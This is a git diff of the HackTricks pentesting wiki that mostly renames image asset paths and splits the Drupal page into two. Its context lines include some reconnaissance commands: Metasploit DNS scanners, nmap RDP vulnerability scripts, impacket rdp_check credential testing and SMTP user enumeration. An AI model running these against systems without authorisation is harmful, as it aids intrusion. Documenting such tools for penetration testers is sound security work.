diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png index ee3722524..e70bceed6 100644 Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index e70bceed6..d798d9edc 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index d798d9edc..1ec78aebd 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (10) (1).png b/.gitbook/assets/image (10) (1).png index d3370cd6f..00fb8b946 100644 Binary files a/.gitbook/assets/image (10) (1).png and b/.gitbook/assets/image (10) (1).png differ diff --git a/.gitbook/assets/image (10).png b/.gitbook/assets/image (10).png index 00fb8b946..210d7bd3f 100644 Binary files a/.gitbook/assets/image (10).png and b/.gitbook/assets/image (10).png differ diff --git a/.gitbook/assets/image (11) (1).png b/.gitbook/assets/image (11) (1).png index 78cc16af3..70fe9294a 100644 Binary files a/.gitbook/assets/image (11) (1).png and b/.gitbook/assets/image (11) (1).png differ diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png index 70fe9294a..277c44d2c 100644 Binary files a/.gitbook/assets/image (11).png and b/.gitbook/assets/image (11).png differ diff --git a/.gitbook/assets/image (12) (1).png b/.gitbook/assets/image (12) (1).png index c29de7533..1a985c3d4 100644 Binary files a/.gitbook/assets/image (12) (1).png and b/.gitbook/assets/image (12) (1).png differ diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png index 1a985c3d4..fd5fec3d9 100644 Binary files a/.gitbook/assets/image (12).png and b/.gitbook/assets/image (12).png differ 
diff --git a/.gitbook/assets/image (13) (1).png b/.gitbook/assets/image (13) (1).png index 474931f56..cee86ab50 100644 Binary files a/.gitbook/assets/image (13) (1).png and b/.gitbook/assets/image (13) (1).png differ diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png index cee86ab50..4c2c4ab67 100644 Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ diff --git a/.gitbook/assets/image (14) (1).png b/.gitbook/assets/image (14) (1).png index 5edd2e9f5..e0b33932e 100644 Binary files a/.gitbook/assets/image (14) (1).png and b/.gitbook/assets/image (14) (1).png differ diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png index e0b33932e..f5207ab5b 100644 Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ diff --git a/.gitbook/assets/image (15) (1).png b/.gitbook/assets/image (15) (1).png index fed36b16d..e0b33932e 100644 Binary files a/.gitbook/assets/image (15) (1).png and b/.gitbook/assets/image (15) (1).png differ diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png index e0b33932e..11fd861cf 100644 Binary files a/.gitbook/assets/image (15).png and b/.gitbook/assets/image (15).png differ diff --git a/.gitbook/assets/image (16) (1).png b/.gitbook/assets/image (16) (1).png index b3a5bfb51..354be02ad 100644 Binary files a/.gitbook/assets/image (16) (1).png and b/.gitbook/assets/image (16) (1).png differ diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png index 354be02ad..5d7f744a6 100644 Binary files a/.gitbook/assets/image (16).png and b/.gitbook/assets/image (16).png differ diff --git a/.gitbook/assets/image (17) (1).png b/.gitbook/assets/image (17) (1).png index 1b412b105..6856b34b8 100644 Binary files a/.gitbook/assets/image (17) (1).png and b/.gitbook/assets/image (17) (1).png differ 
diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png index 6856b34b8..3b1e0666a 100644 Binary files a/.gitbook/assets/image (17).png and b/.gitbook/assets/image (17).png differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index 70413c7ff..82f1650c7 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 82f1650c7..176e28e26 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 2c0467343..f2f640d8c 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index f2f640d8c..17acb7d7e 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png index 8f2e02767..ffd8adf04 100644 Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index ffd8adf04..ee3722524 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index ee3722524..92ceed745 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png index 8f87ed9e5..b2c2c3d26 100644 Binary files a/.gitbook/assets/image (5) (1) (1).png and b/.gitbook/assets/image (5) (1) (1).png differ 
diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png index b2c2c3d26..70413c7ff 100644 Binary files a/.gitbook/assets/image (5) (1).png and b/.gitbook/assets/image (5) (1).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png index 70413c7ff..e7f03abf8 100644 Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image (6) (1).png b/.gitbook/assets/image (6) (1).png index 8f87ed9e5..3646dc3f3 100644 Binary files a/.gitbook/assets/image (6) (1).png and b/.gitbook/assets/image (6) (1).png differ diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png index 3646dc3f3..e5ab74cb8 100644 Binary files a/.gitbook/assets/image (6).png and b/.gitbook/assets/image (6).png differ diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png index a75850811..13854046c 100644 Binary files a/.gitbook/assets/image (7) (1).png and b/.gitbook/assets/image (7) (1).png differ diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png index 13854046c..511d74528 100644 Binary files a/.gitbook/assets/image (7).png and b/.gitbook/assets/image (7).png differ diff --git a/.gitbook/assets/image (8) (1).png b/.gitbook/assets/image (8) (1).png index 066cf2ec8..6c2c20ea1 100644 Binary files a/.gitbook/assets/image (8) (1).png and b/.gitbook/assets/image (8) (1).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png index 6c2c20ea1..4464dc171 100644 Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ diff --git a/.gitbook/assets/image (9) (1).png b/.gitbook/assets/image (9) (1).png index d8f7dcb75..2c0467343 100644 Binary files a/.gitbook/assets/image (9) (1).png and b/.gitbook/assets/image (9) (1).png differ 
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png index 2c0467343..a3d5f99f0 100644 Binary files a/.gitbook/assets/image (9).png and b/.gitbook/assets/image (9).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 3b1e0666a..4c7c93f13 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/README.md b/README.md index 771bbe95f..2635faf75 100644 --- a/README.md +++ b/README.md @@ -79,7 +79,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to ### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit -<figure><img src=".gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure> +<figure><img src=".gitbook/assets/image (15) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to ### [SerpApi](https://serpapi.com/) -<figure><img src=".gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure> +<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure> SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you. diff --git a/SUMMARY.md b/SUMMARY.md index 9c3525572..edb46a455 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -373,7 +373,8 @@ * [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md) * [CGI](network-services-pentesting/pentesting-web/cgi.md) * [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md) - * [Drupal](network-services-pentesting/pentesting-web/drupal.md) + * [Drupal](network-services-pentesting/pentesting-web/drupal/README.md) + * [Drupal RCE](network-services-pentesting/pentesting-web/drupal/drupal-rce.md) * [Electron Desktop Apps](network-services-pentesting/pentesting-web/electron-desktop-apps/README.md) * [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md) * [Electron contextIsolation RCE via Electron internal code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md) diff --git a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md index 68cce870b..47356ba53 100644 --- a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md +++ b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md 
@@ -40,7 +40,7 @@ This gadget basically allows to confirm that something interesting was executed This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**: -<figure><img src="../../.gitbook/assets/image (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure> These would be the gadgets: diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md index a93a71e2f..d935b617f 100644 --- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -87,7 +87,7 @@ gef➤ search-pattern 0x400560 Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets: -<figure><img src="../../.gitbook/assets/image (2).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (2) (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure> Check this page for more info: diff --git a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index 125322a17..7bbb35e38 100644 
--- a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -156,7 +156,7 @@ int main(int argc, char **argv) { In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**: -<figure><img src="../../../.gitbook/assets/image.png" alt="" width="563"><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (17).png" alt="" width="563"><figcaption></figcaption></figure> Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it: diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index df1d46bc7..64b01ee49 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). 
@@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions * All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 21863df48..937e09f0d 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) * [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md) -<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). 
diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index 925db79a2..3718738d4 100644 --- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE). -<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md index 5b84ea518..5db81b661 100644 --- a/network-services-pentesting/pentesting-dns.md +++ b/network-services-pentesting/pentesting-dns.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -201,7 +201,7 @@ dig google.com A @<IP> .png>) -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -322,7 +322,7 @@ Entry_6: Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' ``` -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. 
diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md index 270b140cc..015e6b631 100644 --- a/network-services-pentesting/pentesting-rdp.md +++ b/network-services-pentesting/pentesting-rdp.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -75,7 +75,7 @@ rdp\_check.py from impacket let you check if some credentials are valid for a RD rdp_check <domain>/<name>:<password>@<IP> ``` -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. 
@@ -168,7 +168,7 @@ Entry_2: Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP} ``` -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-remote-gdbserver.md b/network-services-pentesting/pentesting-remote-gdbserver.md index 2f3b59698..c9e7230d5 100644 --- a/network-services-pentesting/pentesting-remote-gdbserver.md +++ b/network-services-pentesting/pentesting-remote-gdbserver.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. 
@@ -199,7 +199,7 @@ RemoteCmd() ``` {% endcode %} -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-smtp/README.md b/network-services-pentesting/pentesting-smtp/README.md index c83ff37e5..d65dd0be3 100644 --- a/network-services-pentesting/pentesting-smtp/README.md +++ b/network-services-pentesting/pentesting-smtp/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. 
@@ -188,7 +188,7 @@ smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP> Nmap: nmap --script smtp-enum-users <IP> ``` -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -625,7 +625,7 @@ Entry_8: ``` -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-smtp/smtp-commands.md b/network-services-pentesting/pentesting-smtp/smtp-commands.md index 2a8dd7bcb..bfa699e1a 100644 --- a/network-services-pentesting/pentesting-smtp/smtp-commands.md +++ b/network-services-pentesting/pentesting-smtp/smtp-commands.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -61,7 +61,7 @@ It’s a client’s request for some information that can be useful for the a su **QUIT**\ It terminates the SMTP conversation. -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-smtp/smtp-smuggling.md b/network-services-pentesting/pentesting-smtp/smtp-smuggling.md index b66196007..9ea75aa8d 100644 --- a/network-services-pentesting/pentesting-smtp/smtp-smuggling.md +++ b/network-services-pentesting/pentesting-smtp/smtp-smuggling.md 
@@ -22,7 +22,7 @@ This type of vulnerability was [**originally discovered in this post**](https:// This is because in the SMTP protocol, the **data of the message** to be sent in the email is controlled by a user (attacker) which could send specially crafted data abusing differences in parsers that will smuggle extra emails in the receptor. Take a look to this illustrated example from the original post: -<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (8) (1).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure> ### How diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md index cb4e39f7d..7e2d77e7e 100644 --- a/network-services-pentesting/pentesting-snmp/README.md +++ b/network-services-pentesting/pentesting-snmp/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). 
@@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can * snmpd.conf * snmp-config.xml -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md index 8161c6562..9bb61797b 100644 --- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -12,7 +12,7 @@ </details> -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-telnet.md b/network-services-pentesting/pentesting-telnet.md index 75eaa580a..9c00ef372 100644 --- a/network-services-pentesting/pentesting-telnet.md 
+++ b/network-services-pentesting/pentesting-telnet.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -94,7 +94,7 @@ Entry_4: ``` -<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md index ed1608220..f7b4e6fbf 100644 --- a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md +++ b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -134,7 +134,7 @@ guest guest * [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122) * [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster) -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index b83a7f970..88d19dda7 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md 
